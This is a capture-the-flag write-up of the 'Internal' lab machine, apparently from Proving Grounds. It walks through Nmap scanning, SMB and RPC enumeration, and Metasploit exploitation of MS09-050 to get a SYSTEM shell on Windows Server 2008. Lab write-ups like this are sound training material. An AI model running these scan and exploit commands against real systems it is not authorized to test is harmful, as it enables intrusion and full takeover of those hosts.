Internal

Initial Reconnaissance

We begin by conducting a full Nmap scan to identify open ports and running services on the target machine. It’s important to scan all 65,535 TCP ports to ensure nothing is missed.

sudo nmap -Pn -n 192.168.113.40 -sC -sV -p- --open -v

Flag Breakdown:

• Pn: Skips host discovery—assumes the host is online.
• n: Prevents DNS resolution to speed up the scan.
• sC: Runs default Nmap scripts for common checks.
• sV: Attempts to determine service versions.
• p-: Scans all TCP ports from 1 to 65535.
• -open: Only displays ports that are confirmed to be open.
• v: Enables verbose output for more detail.

Nmap Results:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.0.6001 (17714650)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info: 
|   Target_Name: INTERNAL
|   NetBIOS_Domain_Name: INTERNAL
|   NetBIOS_Computer_Name: INTERNAL
|   DNS_Domain_Name: internal
|   DNS_Computer_Name: internal
|   Product_Version: 6.0.6001
|_  System_Time: 2025-07-22T07:04:29+00:00
|_ssl-date: 2025-07-22T07:04:38+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=internal
| Issuer: commonName=internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-01-05T19:52:51
| Not valid after:  2025-07-07T19:52:51
| MD5:   7c2b:85a9:1fe2:c264:4be8:ed3e:e16b:274a
|_SHA-1: 05e9:c5e9:7ac6:242e:0a18:ca56:e1b5:1c38:31db:d393
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
| smb2-time: 
|   date: 2025-07-22T07:04:29
|_  start_date: 2025-02-20T21:30:47
| nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:19:d7 (VMware)
| Names:
|   INTERNAL<00>         Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  INTERNAL<20>         Flags: <unique><active>
|_clock-skew: mean: 1h23m59s, deviation: 3h07m50s, median: -1s
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: internal
|   NetBIOS computer name: INTERNAL\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-07-22T00:04:29-07:00
| smb2-security-mode: 
|   2:0:2: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap Output Highlights:

Open TCP ports:

• 53 - Microsoft DNS
• 135 - Microsoft RPC
• 139, 445 - NetBIOS/SMB file sharing services
• 3389 - Remote Desktop Protocol (RDP)
• 5357 - HTTP API (Web Services on Devices)
• 49152–49158 - Dynamic ports used by Microsoft RPC

Service information confirms the host is running Windows Server 2008 Standard SP1 and is part of the INTERNAL domain.

Hostname and System Info:

• Hostname: internal
• Domain: internal
• Workgroup: WORKGROUP
• OS Version: Windows Server 2008 SP1

Next, it is a good practice to run a top UDP port scan:

sudo nmap -Pn -n 192.168.113.40 -sU --top-ports=100 --reason

UDP scans often reveal services like SNMP or DNS running over UDP. While this particular scan returned no useful results, it is still important to run the scan.

Let’s add the hostname internal to our local /etc/hosts file for convenience:

sudo nano /etc/hosts
# Add:
# 192.168.113.40   internal

Port Analysis and Enumeration

Port 53 - DNS

We try a zone transfer to enumerate subdomains and internal hostnames. A successful zone transfer can reveal valuable internal names.

dig @192.168.113.40 axfr internal

Result: Zone transfer failed which is expected unless misconfigured.

Port 135 - Microsoft RPC

We attempt to connect using rpcclient, which allows interaction with the Windows RPC service.

rpcclient -U '' -N 192.168.113.40

• U '': Empty username (anonymous login)
• N: No password required

Connection succeeds! You can press Tab twice to see available commands.

We use the following to enumerate domain users:

enumdomusers

This may return a list of usernames from the domain, which could be useful for password attacks or other enumeration.

Result: Access Denied.

Ports 139 and 445 - SMB

We start by gathering basic information using:

enum4linux 192.168.113.40

This tool combines multiple enumeration techniques (like NetBIOS, RPC, and SMB). We do not get any useful information. The only indication of a connection is from enum4linux.

We follow up with:

smbclient -N -L \\\\192.168.113.40\\

This lists available shares on the target. In this case, nothing is accessible via anonymous login.

Port 3389 - Remote Desktop Protocol (RDP)

Although we don’t yet have credentials, we test if RDP is accessible.

rdesktop internal

The server prompts us with certificate warnings. Click through to view the login screen. Sometimes usernames are visible depending on the RDP configuration. Also, check the Ease of Access options on the login screen. Some privilege escalation techniques exploit this functionality if the system is vulnerable.

Port 5357 - HTTPAPI (Web Services on Devices)

This is where things get interesting. A quick Google search shows that port 5357 is associated with WSDAPI on Windows and has a known vulnerability.

One of the top results points to a Microsoft Security Bulletin (MS09-050), which affects Windows Server 2008 which is our target OS.

We find a relevant Exploit-DB entry and even a Metasploit module:

• Exploit Title: ms09_050_smb2_negotiate_func_index
• Affected: Windows Vista / Server 2008 with SMB2 enabled

Gaining Initial Access

Given the above, we proceed using the Metasploit Framework.

msfconsole

We will use the module 0 (exploit/windows/smb/ms09_050_smb2_negotiate_func_index).

use 0

Check required options:

show options

Set the required parameters and run the exploit:

set lhost tun0
set rhosts 192.168.113.40
run

If successful, you’ll get a Meterpreter session. Switch to a regular shell for further interaction:

shell

We now have access to the target system as nt authority\system.

Capturing the Flag

The flag is located in Administrator’s Desktop.

References

• https://medium.com/@Dpsypher/proving-grounds-practice-internal-e5098dd29793